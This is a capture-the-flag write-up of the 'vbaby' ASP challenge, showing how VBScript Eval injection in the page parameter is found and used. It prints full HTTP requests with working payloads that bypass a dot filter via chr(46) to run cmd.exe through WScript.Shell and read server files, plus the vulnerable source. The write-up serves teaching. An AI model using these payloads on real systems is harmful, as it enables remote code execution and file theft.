The vbaby challenge was a simple ASP web application that accepted a single page parameter. We initially thought that it could be a local file inclusion vulnerability and therefore tried a path traversal attack:

GET /Default.asp?page=../boot.ini HTTP/1.1
Host: vbaby.insomni.hack
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

However we did get a VBScript runtime error instead indicating that we might have a command injection:

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDQQBTRBBS=BCAMGJJCALIGLACDAKCGNONE; path=/
Date: Fri, 23 Mar 2018 19:20:51 GMT
Connection: close
Content-Length: 1129

<!DOCTYPE html>
<html>
...
div class="content">
 <font face="Arial" size=2>
<p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a0006'</font>
<p>
<font face="Arial" size=2>Overflow</font>
<p>
<font face="Arial" size=2>/Default.asp</font><font face="Arial" size=2>, line 0</font>

Using a simple concatenation with the Now command we can show that we indeed have a command injection vulnerability:

GET /Default.asp?page=a+%26+Now HTTP/1.1
Host: vbaby.insomni.hack
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response with the current date and time embedded:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDQSDTQBAS=OHBENAMCLJHJLNIBIJNEMPLK; path=/
Date: Fri, 23 Mar 2018 23:42:01 GMT
Connection: close
Content-Length: 925

<!DOCTYPE html>
<html>
...
<div class="content">
3/24/2018 12:42:02 AM
</div>
</body>
</html>

Further testing showed that the . character was however filtered out from our payloads. However, this can by bypassed by using the chr() function. Using that bypass we could finally run arbitrary commands on the server. The following request ist used to obtain the directory listing of the c:\ drive using Server.CreateObject(“WScript.shell”).Exec(“cmd /c dir C:\”).StdOut.ReadAll. Note that the Page parameter has been added to get back a copy of our payload:

GET /Default.asp?page=a+%26+Eval("Server"+%26+chr(46)+%26+"CreateObject(""WScript"+%26+chr(46)+%26+"shell"")"+%26+chr(46)+%26+"Exec(""cmd+/c+dir+C:\"")"+%26+chr(46)+%26+"StdOut"+%26+chr(46)+%26+"ReadAll")+%26+Page HTTP/1.1
Host: vbaby.insomni.hack
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response with listing:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDSSASRDBT=ECLNCDNCAGHHCEOGINEECMLC; path=/
Date: Sat, 24 Mar 2018 03:02:22 GMT
Connection: close
Content-Length: 1834

<!DOCTYPE html>
<html>
...
<div class="content">
 Volume in drive C has no label.
 Volume Serial Number is 2034-C7EB

 Directory of C:\

03/07/2018  12:06 PM    <DIR>          EFSTMPWP
03/13/2018  03:42 PM    <DIR>          inetpub
08/22/2013  04:52 PM    <DIR>          PerfLogs
08/02/2017  01:21 PM    <DIR>          Program Files
08/22/2013  04:39 PM    <DIR>          Program Files (x86)
03/07/2018  09:14 AM    <DIR>          sysprep
03/24/2018  12:54 AM    <DIR>          Temp
03/16/2018  01:14 PM                25 this_file_contains_the_flag_guys.txt
03/13/2018  11:31 AM    <DIR>          Users
03/13/2018  03:43 PM    <DIR>          Windows
03/19/2018  02:43 PM    <DIR>          zabbix
               1 File(s)             25 bytes
              10 Dir(s)  52,295,127,040 bytes free
a & Eval("Server" & chr(46) & "CreateObject(""WScript" & chr(46) & "shell"")" & chr(46) & "Exec(""cmd /c dir C:\"")" & chr(46) & "StdOut" & chr(46) & "ReadAll") & Page
</div>
</body>
</html>

Request to read the contents of the flag file using Server.CreateObject(“Scripting.FileSystemObject”).OpenTextFile(“C:\this_file_contains_the_flag_guys.txt”).ReadAll():

GET /Default.asp?page=a+%26+Eval("Server"+%26+chr(46)+%26+"CreateObject(""Scripting"+%26+chr(46)+%26+"FileSystemObject"")"+%26+chr(46)+%26+"OpenTextFile(""C:\this_file_contains_the_flag_guys"+%26+chr(46)+%26+"txt"")"+%26+chr(46)+%26+"ReadAll()")+%26+Page HTTP/1.1
Host: vbaby.insomni.hack
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response containing the flag:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDSSASRDBT=FCLNCDNCHBHJEJFPEBALIKAC; path=/
Date: Sat, 24 Mar 2018 03:03:19 GMT
Connection: close
Content-Length: 1137

<!DOCTYPE html>
<html>
...
<div class="content">
INS{VBEval-1s-not-fun-:(}a & Eval("Server" & chr(46) & "CreateObject(""Scripting" & chr(46) & "FileSystemObject"")" & chr(46) & "OpenTextFile(""C:\this_file_contains_the_flag_guys" & chr(46) & "txt"")" & chr(46) & "ReadAll()") & Page
</div>
</body>
</html>

If you are interested in the actual vulnerability you can also read the content of the Default.asp page using the vulnerability itself:

GET /Default.asp?page=a+%26+Eval("Server"+%26+chr(46)+%26+"CreateObject(""Scripting"+%26+chr(46)+%26+"FileSystemObject"")"+%26+chr(46)+%26+"OpenTextFile(""C:\inetpub\wwwroot\Default"+%26+chr(46)+%26+"asp"")"+%26+chr(46)+%26+"ReadAll()")+%26+Page HTTP/1.1
Host: vbaby.insomni.hack
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Source code of the vulnerable page:

<!DOCTYPE html>
<html>
<head>
	<style>
		body {
			background-color:#eee;
		}

		.menu-item {
			display:inline-block;
			padding: 10px 15px;
			border:1px solid darkred;
		}

		.menu-item a {
			text-decoration:none;
			color:#333;
		}

		.content {
			display:block;
			min-height:350px;
			min-width:250px;
			background-color:#ccc;
			border:5px solid white;
		}

		.content p {
			margin:30px;
		}
	</style>
</head>
<body>
<div class="menu">
	<div class="menu-item"><a href="/Default.asp?page=Index">Home</a></div>
	<div class="menu-item"><a href="/Default.asp?page=Whoami">Whoami</a></div>
	<div class="menu-item"><a href="/Default.asp?page=TBD">TBD</a></div>
	<div class="menu-item"><a href="/Default.asp?page=TBD">TBD</a></div>
	<div class="menu-item"><a href="/Default.asp?page=TBD">TBD</a></div>
</div>
<div class="content">
<%

	Function PageWriteIndex()
		PageWriteIndex = "<p>Hello world!</p><p>My Website is still under construction, but you can view some details about my project.</p><p>Hope you'll have fun!</p>"
	End Function
	Function PageWriteWhoami()
		PageWriteWhoami = "<p>I'm Blaklis, a hacker that wants to dominate the world.</p><p>This website will give you all my future actions to become teh master!</p>"
	End Function
	Function PageWriteTBD()
		PageWriteTBD = "<p>Come back later!</p>"
	End Function

	Dim page
	page = "Index"
	If Request.QueryString("page") <> "" THEN
		page = Request.QueryString("page")
	End If
	Response.Write(Eval("PageWrite"+Replace(page,".","")))
%>
</div>
</body>
</html>